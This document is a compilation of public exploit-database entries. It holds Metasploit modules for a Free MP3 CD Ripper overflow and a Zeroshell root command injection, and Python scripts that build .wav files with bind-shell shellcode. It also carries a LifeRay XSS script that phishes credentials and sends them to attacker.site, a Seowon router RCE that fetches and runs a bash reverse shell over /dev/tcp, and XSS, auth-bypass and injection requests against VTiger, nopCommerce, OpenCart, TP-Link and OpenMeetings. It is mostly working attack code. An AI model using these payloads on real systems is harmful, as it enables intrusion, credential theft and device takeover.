## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT def initialize(info={}) super(update_info(info, 'Name' => "Free MP3 CD Ripper 2.6 < 2.8 (.wma.wav.flac.m3u.acc) Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8. By constructing a specially crafted WMA WAV M3U ACC FLAC file and attempting to convert it to an MP3 file in the application, a buffer is overwritten, which allows for running shellcode. }, 'License' => MSF_LICENSE, 'Author' => [ 'Gionathan Reale', # Exploit-DB POC 'ZwX' # Metasploit Module ], 'References' => [ [ 'CVE', '2019-9767' ], [ 'EDB', '45412' ], [ 'URL', 'https://www.exploit-db.com/exploits/45412' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 x86 - Windows 7 x64', { 'Ret' => 0x66e42121 # POP POP RET } ] ], 'Payload' => { 'BadChars' => "\x00\x0a\x0d\x2f" }, 'Privileged' => false, 'DisclosureDate' => "Sep 09 2018", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'Create malicious file example extension (.wma .wav .acc .flac .m3u)', 'name.wma']) ]) end def exploit file_payload = payload.encoded msfsploit = make_fast_nops(4116) msfsploit << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH_JMP msfsploit << [target.ret].pack("V*") # SEH msfsploit << file_payload msfsploit << make_fast_nops(4440) file_create(msfsploit) end end

# Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit # Date: 17.09.2020 # Vendor Homepage: http://www.boxoft.com/ # Software Link: http://www.boxoft.com/convert-master/setup(boxoft-conver=t-master).exe # Exploit Author: Achilles # Tested Version: 1.3.0 # Tested on: Windows 7 x64 # 1.- Run python code :Boxoft_Convert_Master.py # 2.- Open Boxoft_Convert_Master.exe # 3.- Click try and Batch Convert Mode # 4.- Add Evil.wav # 5.- And you will have a bind shell port 4444 # 6.- Greetings go:XiDreamzzXi,Metatron #!/usr/bin/env python import struct buffer = "\x41" * 4132 nseh = "\xeb\x06\x90\x90" #jmp short 6 seh = struct.pack('<L',0x6d00c683) #CDRip122.dll nops = "\x90" * 20 #Bind=shellcode port 4444 shellcode = ("\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33" "\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79" "\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75" "\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca" "\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4" "\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac" "\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf" "\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1" "\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2" "\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a" "\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f" "\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda" "\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e" "\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99" "\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e" "\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19" "\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57" "\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c" "\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5" "\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86" "\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8" "\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a" "\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3" "\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69" "\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89" "\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2" "\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9" "\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67" "\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24" "\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60" "\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75" "\xc8\x28\x1b\xd5\x3f\x51") payload = buffer + nseh + seh + nops + shellcode try: f=open("Evil.wav","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS # Date: 10/05/2020 # Exploit Author: 3ndG4me # Vendor Homepage: https://www.liferay.com/ # Software Link: https://www.liferay.com/ # Version: 7.1.0 -> 7.2.1 GA2 (REQUIRED) # Tested on: Debian Linux # CVE : CVE-2020-7934 # Public Exploit/Whitepaper: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934 # NOTE: The attached proof of concept is a javascript payload, submitted as a ".txt" file to attach via email as ".js" is often blocked. // CVE-2020-7934 Cred Phishing Example Attack // Author: 3ndG4me // Github: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934 // Host this payload with your site and paste in this script tag into a vulnerable field with your URL replaced where relevant: // <SCRIPT SRC="//attacker.site/cve-2020-7934.js"> var email = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your email:", ""); var password = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your password:", ""); console.log(email); console.log(password); var url = "http://attacker.site/" + email + ":" + password; $.get(url);

# Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH) # Discovery by: Luis Martinez # Discovery Date: 2020-11-22 # Vendor Homepage: http://www.boxoft.com/ # Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe # Tested Version: 2.3.0 # Vulnerability Type: Local Buffer Overflow (SEH) # Tested on OS: Windows 10 Pro (10.0.18362) x64 en # Steps to Produce the Local Buffer Overflow (SEH): # 1.- Run python code: Boxotf_Audio_Converter_2.3.0.py # 2.- Open AudioConvert.exe # 3.- Try # 4.- Batch Convert Mode -> Next # 5.- Add # 6.- Select Boxotf_Audio_Converter_2.3.0.wav -> Open # 7.- Port 4444 open #!/usr/bin/env python #-*-coding: utf-8-*- #msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c shellcode = ("\xbb\x80\x84\x2c\xbc\xda\xce\xd9\x74\x24\xf4\x5e\x33\xc9\xb1" "\x53\x31\x5e\x12\x83\xc6\x04\x03\xde\x8a\xce\x49\x22\x7a\x8c" "\xb2\xda\x7b\xf1\x3b\x3f\x4a\x31\x5f\x34\xfd\x81\x2b\x18\xf2" "\x6a\x79\x88\x81\x1f\x56\xbf\x22\x95\x80\x8e\xb3\x86\xf1\x91" "\x37\xd5\x25\x71\x09\x16\x38\x70\x4e\x4b\xb1\x20\x07\x07\x64" "\xd4\x2c\x5d\xb5\x5f\x7e\x73\xbd\xbc\x37\x72\xec\x13\x43\x2d" "\x2e\x92\x80\x45\x67\x8c\xc5\x60\x31\x27\x3d\x1e\xc0\xe1\x0f" "\xdf\x6f\xcc\xbf\x12\x71\x09\x07\xcd\x04\x63\x7b\x70\x1f\xb0" "\x01\xae\xaa\x22\xa1\x25\x0c\x8e\x53\xe9\xcb\x45\x5f\x46\x9f" "\x01\x7c\x59\x4c\x3a\x78\xd2\x73\xec\x08\xa0\x57\x28\x50\x72" "\xf9\x69\x3c\xd5\x06\x69\x9f\x8a\xa2\xe2\x32\xde\xde\xa9\x5a" "\x13\xd3\x51\x9b\x3b\x64\x22\xa9\xe4\xde\xac\x81\x6d\xf9\x2b" "\xe5\x47\xbd\xa3\x18\x68\xbe\xea\xde\x3c\xee\x84\xf7\x3c\x65" "\x54\xf7\xe8\x10\x5c\x5e\x43\x07\xa1\x20\x33\x87\x09\xc9\x59" "\x08\x76\xe9\x61\xc2\x1f\x82\x9f\xed\x0e\x0f\x29\x0b\x5a\xbf" "\x7f\x83\xf2\x7d\xa4\x1c\x65\x7d\x8e\x34\x01\x36\xd8\x83\x2e" "\xc7\xce\xa3\xb8\x4c\x1d\x70\xd9\x52\x08\xd0\x8e\xc5\xc6\xb1" "\xfd\x74\xd6\x9b\x95\x15\x45\x40\x65\x53\x76\xdf\x32\x34\x48" "\x16\xd6\xa8\xf3\x80\xc4\x30\x65\xea\x4c\xef\x56\xf5\x4d\x62" "\xe2\xd1\x5d\xba\xeb\x5d\x09\x12\xba\x0b\xe7\xd4\x14\xfa\x51" "\x8f\xcb\x54\x35\x56\x20\x67\x43\x57\x6d\x11\xab\xe6\xd8\x64" "\xd4\xc7\x8c\x60\xad\x35\x2d\x8e\x64\xfe\x5d\xc5\x24\x57\xf6" "\x80\xbd\xe5\x9b\x32\x68\x29\xa2\xb0\x98\xd2\x51\xa8\xe9\xd7" "\x1e\x6e\x02\xaa\x0f\x1b\x24\x19\x2f\x0e") nSEH = "\xeb\x06\x90\x90" SEH = "\xB8\x68\x40\x00" #AudioConvert.exe buffer = "\x41" * 4132 + nSEH + SEH + "\x90" * 16 + shellcode f = open ("Boxotf_Audio_Converter_2.3.0.wav", "w") f.write(buffer) f.close()

# Exploit Title: VTiger v7.0 CRM - 'To' Persistent XSS # Date: 2020-11-18 # Exploit Vulnerability-Lab # Vendor Homepage: https://www.vtiger.com/open-source-crm/download-open-source/ # Software Link: https://sourceforge.net/projects/vtigercrm/files/ # Version: v7.0 Document Title: =============== VTiger v7.0 CRM - (To) Persistent Email Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2227 Release Date: ============= 2020-11-18 Vulnerability Laboratory ID (VL-ID): ==================================== 2227 Common Vulnerability Scoring System: ==================================== 4.8 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Vtiger CRM is web-application built using PHP. Choose the best CRM for your business. Custom Module & Relationship builder for VTiger is a very useful extension that allows crm administrators to create custom modules within few clicks. All custom modules are created following strict VTiger standards. In addition, the relationship builder allows crm admin to link together existing modules as well as new custom modules. (Copy of the Homepage: https://www.vtiger.com/open-source-crm/download-open-source/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the VTiger v7.0 CRM open-source web-application. Affected Product(s): ==================== VTExperts Product: VTiger v7.0 - CRM (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-04-27: Public Disclosure (Vulnerability Laboratory) 2020-04-28: Researcher Notification & Coordination (Security Researcher) 2020-04-29: Vendor Notification 1 (Security Department) 2020-05-30: Vendor Notification 2 (Security Department) 2020-06-22: Vendor Notification 3 (Security Department) ****-**-**: Vendor Response/Feedback (Security Department) ****-**-**: Vendor Fix/Patch (Service Developer Team) ****-**-**: Security Acknowledgements (Security Department) 2020-11-18: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Full Disclosure Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official VTiger v7.0 CRM open-source web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent cross site scripting web vulnerability is located in the `searchValue` Parameter of the `Emails Compose` module. Attackers are able to inject own mlicious script code in the `To` sender input field of the email compose module to attack other user accounts. The email can be delivered with multiple receipients which allows an attacker to insert the target email and a malicious payload. The request method to inject is GET via searchValue and POST on compose with persistent attack vector. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST [+] GET Vulnerable Module(s): [+] Email Compose (index.php?module=Emails) Vulnerable Input(s): [+] To (Sender - Email) Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged account and with low user interaction. For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue. PoC: Url http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY# Manual steps to reproduce the vulnerability ... 1. Open the web-application ui 2. Login with a regular user role to the ui 3. Open vendors and move to compose to email form 4. Inject malicious payload as "to" sender information and as well a valid email to target 5. Send the request after the compose 6. Wait until the administrator or higher privileged targeted users click in the email or receives the email on preview 7. Successful reproduce of the cross site scripting web vulnerability! PoC: Vulnerable Source (Execution Point) <div class="col-lg-12"><div class="col-lg-2"><span class="pull-right">To&nbsp;<span class="redColor">*</span></span></div> <div class="col-lg-6"><div class="select2-container select2-container-multi autoComplete sourceField select2" id="s2id_emailField" style="width: 100%;"><ul class="select2-choices ui-sortable"> <li class="select2-search-choice"> <div>IT <b>(test@test.com)</b></div> <a href="#" class="select2-search-choice-close" tabindex="-1"></a></li> <li class="select2-search-choice"><div><iframe src"evil.source" onload=alert(document.cookie)></div></iframe></div> --- PoC Session Logs [GET] --- http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=>"<iframe+src%3Da+onload%3Dalert(document.cookie)>&_=1587844428851 Host: localhost:8080 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Connection: keep-alive Referer: http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51 - GET: HTTP/1.1 200 OK Server: Apache/2.4.10 (Debian) Content-Length: 28 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive - Content-Type: text/json; charset=UTF-8 http://localhost:8080/vtigercrm/evil.source Host: localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer: http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51 - GET: HTTP/1.1 200 OK Server: Apache/2.4.10 Content-Length: 299 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Reference(s): http://localhost:8080/vtigercrm/ http://localhost:8080/vtigercrm/index.php http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue= Security Risk: ============== The security risk of the persistent web vulnerability i the web-application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com

# Exploit Title: TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass # Date: 2020/07/29 # Exploit Author: malwrforensics # Vendor Homepage: https://tp-link.com # Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855RE_V5_200415.zip # Version: TL-WA855RE(US)_V5_200415 # Tested on: N/A # CVE : 2020-24363 Important: The vendor has released a fix; the new firmware (TL-WA855RE(US)_V5_200731) is available to download from: https://www.tp-link.com/us/support/download/tl-wa855re/v5/#Firmware Details By default the web interface of the TL-WA855RE wireless extender require users to log in in order to access the admin interface. However, an attacker, on the same network, can bypass it and use the APIs provided to reset the device to its factory settings by using the TDDP_RESET code. An attacker can then set up a new admin password, resulting in a complete takeover of the device. To test, you can send a POST request like the one below using the TDDP_RESET (5). The request doesn't need any type of authentication. You can then access the web interface and set a new administrative password. POST /?code=5&asyn=0 HTTP/1.1 Host: <redacted> Content-Length: 7 Accept: text/plain, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 Content-Type: text/plain;charset=UTF-8 Origin: http://<redacted> Referer: http://<redacted> Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close 0|1,0,0

# Exploit Title: nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting # Date: 24-11-2020 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://www.nopcommerce.com/ # Version: 4.30 # Tested on: Windows 10/Kali Linux # CVE: CVE-2020-29475 Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Attack vector: This vulnerability can results attacker to inject the XSS payload in Schedule tasks and each time any user will go to that page of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Schedule tasks. Steps-To-Reproduce: 1. Go to the nopCommerce Store admin page. 2. Now go to the System-Schedule tasks option. 3. Now click to on edit button on any task. 4. Put the below payload in Schedule tasks: "hemantsolo"><img src=x onerror=confirm(1)>" 5. Now click on Update button. 6. The XSS will be triggered. POST /Admin/ScheduleTask/TaskUpdate HTTP/1.1 Host: 127.0.0.1 Connection: close Content-Length: 335 Accept: application/json, text/javascript, */*; q=0.01 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: 127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: 127.0.0.1/Admin/ScheduleTask/List Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6 Cookie: xyz Id=5&Name=hemantsolo%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm(1)%3E&Seconds=3600&Enabled=false&StopOnError=false&__RequestVerificationToken=CfDJ8Hstb5ORl7RLtnBnyhE10fENmFHuOPhDq-cN_XNT5gs_nUq2ht5UeggYY9Fea9OqSCeJnVy_e4IKpQ7HhLYwtOMRS76BYcfJ9Os-CI9BxTxrumbAaunwIxrDMZm6CbNRs9EPzKQabez4H7dNpXG6oVpiC5Pc__xQVm06bp4c4O_D15lqehkk6EmqDAizfm8LFA

# Exploit Title: Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated) # Date: 5 Aug 2020 # Exploit Author: maj0rmil4d # Vendor Homepage: http://www.seowonintech.co.kr/en/ # Hardware Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kindB05&middle_kindB05_29 # Version: 1.0.11 (Possibly all versions) The default user/pass is admin/admin your commands run as root user the vulnerablity is on the ipAddr parameter in system_log.cgi Usage: login to the dashboard. setup your listener. download the revshell.txt with the RCE run the revshell.txt * here is the RCE request : POST /cgi-bin/system_log.cgi? HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201= 00101 Firefox/79.0 Accept: */* Accept-Language: en-US,en;q0.5 Accept-Encoding: gzip, deflate Content-type: application/x-www-form-urlencoded Content-Length: 183 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/diagnostic.html?t201802140812 Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; = connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen= ; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna= ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; = cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan= Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408= 4662; cpe_loginadmin; _lang CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56= &pingTimeout30&pingCount4&ipAddr;id&maxTTLCnt30&queriesCnt3&= reportIpOnlyCheckboxon&btnApplyApply&T1596644096617 * to get a reverse shell, setup the listener and download the file on the r= outer then run it . * the content of the revshell.txt : bash -i >& /dev/tcp/192.168.1.10/45214 0>&1 * to download : POST /cgi-bin/system_log.cgi? HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201= 00101 Firefox/79.0 Accept: */* Accept-Language: en-US,en;q0.5 Accept-Encoding: gzip, deflate Content-type: application/x-www-form-urlencoded Content-Length: 183 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/diagnostic.html?t201802140812 Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; = connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen= ; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna= ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; = cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan= Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408= 4662; cpe_loginadmin; _lang CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56= &pingTimeout30&pingCount4&ipAddr;wget http://192.168.1.10/revshell= .txt&maxTTLCnt30&queriesCnt3&reportIpOnlyCheckboxon&btnApplyApp= ly&T1596644096617 * to run it : POST /cgi-bin/system_log.cgi? HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201= 00101 Firefox/79.0 Accept: */* Accept-Language: en-US,en;q0.5 Accept-Encoding: gzip, deflate Content-type: application/x-www-form-urlencoded Content-Length: 183 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/diagnostic.html?t201802140812 Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; = connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen= ; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna= ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; = cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan= Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408= 4662; cpe_loginadmin; _lang CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56= &pingTimeout30&pingCount4&ipAddr;bash revshell.txt&maxTTLCnt30&= queriesCnt3&reportIpOnlyCheckboxon&btnApplyApply&T1596644096617

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Zeroshell 3.9.0 Remote Command Execution', 'Description' => %q{ This module exploits an unauthenticated command injection vulnerability found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url. As sudo is configured to execute /bin/tar without a password (NOPASSWD) it is possible to run root commands using the "checkpoint" tar options. }, 'Author' => [ 'Juan Manuel Fernandez', # Vulnerability discovery 'Giuseppe Fuggiano <giuseppe[dot]fuggiano[at]gmail.com>', # Metasploit module ], 'References' => [ ['CVE', '2019-12725'], ['URL', 'https://www.tarlogic.com/advisories/zeroshell-rce-root.txt'], ['URL', 'https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py'] ], 'DisclosureDate' => 'Jul 17 2019', 'License' => MSF_LICENSE, 'Privileged' => true, 'Platform' => [ 'unix', 'linux' ], 'Arch' => [ ARCH_X86 ], 'Targets' => [ ['Zeroshell 3.9.0 (x86)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, }], ], 'DefaultTarget' => 0, )) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), ]) end def execute_command(cmd, opts = {}) command_payload = "%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22#{filter_bad_chars(cmd)}%22%0A%27" print_status("Sending stager payload...") res = send_request_cgi( 'method' => 'GET', 'uri' => '/cgi-bin/kerbynet', 'encode_params' => false, 'vars_get' => { 'Action' => 'x509view', 'Section' => 'NoAuthREQ', 'User' => '', 'x509type' => command_payload } ) return res end def filter_bad_chars(cmd) cmd.gsub!(/chmod \+x/, 'chmod 777') cmd.gsub!(/;/, " %0A ") cmd.gsub!(/ /, '+') cmd.gsub!(/\//, '%2F') return cmd end def check res = execute_command('id') if res && res.body.include?("uid=0(root)") Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit print_status("Exploiting...") execute_cmdstager(flavor: :wget, delay: 5) end end

# Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service # Google Dork: "Apache OpenMeetings DOS" # Date: 2020-08-28 # Exploit Author: SunCSR (ThienNV - Sun* Cyber Security Research) # Vendor Homepage: https://openmeetings.apache.org/ # Software Link: https://openmeetings.apache.org/ # Version: 4.0.0 - 5.0.0 # Tested on: Windows # CVE: CVE-2020-13951 - POC: # Vulnerability variable: hostname # Payload: x.x.x.x;ls # Request exploit: GET /openmeetings/wicket/bookmarkable/org.apache.openmeetings.web.pages.HashPage?3-1.0-panel~main&app=network&navigatorAppName=Netscape&navigatorAppVersion=5.0 (Windows)&navigatorAppCodeName=Mozilla&navigatorCookieEnabled=true&navigatorJavaEnabled=false&navigatorLanguage=en-US&navigatorPlatform=Win32&navigatorUserAgent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0&screenWidth=1920&screenHeight=1080&screenColorDepth=24&jsTimeZone=Asia/Ho_Chi_Minh&utcOffset=7&utcDSTOffset=7&browserWidth=1920&browserHeight=966&hostname=x.x.x.x;ls&codebase=https://x.x.x.x:5443/openmeetings/hash&settings=[object Object]&_=1597801817026 - Reference: https://lists.apache.org/thread.html/re2aed827cd24ae73cbc320e5808020c8d12c7b687ee861b27d728bbc%40%3Cuser.openmeetings.apache.org%3E https://nvd.nist.gov/vuln/detail/CVE-2020-13951

# Exploit Title: OpenCart 3.0.3.6 - 'Profile Image' Stored Cross Site Scripting (Authenticated) # Date: 24-11-2020 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/index.php?route=cms/download # Version: 3.0.3.6 # Tested on: Windows 10/Kali Linux # CVE: CVE-2020-29471 Vulnerable Parameters: Profile Image. Steps-To-Reproduce: 1. Go to the opencart admin page. 2. Now go to the profile page. * Before the next step write this in notepad ""><svg onload=alert("XSS")>" and save it as an payload.png 3. Now edit the image and uplaod the image as payload.png. 4. The XSS will be triggered.

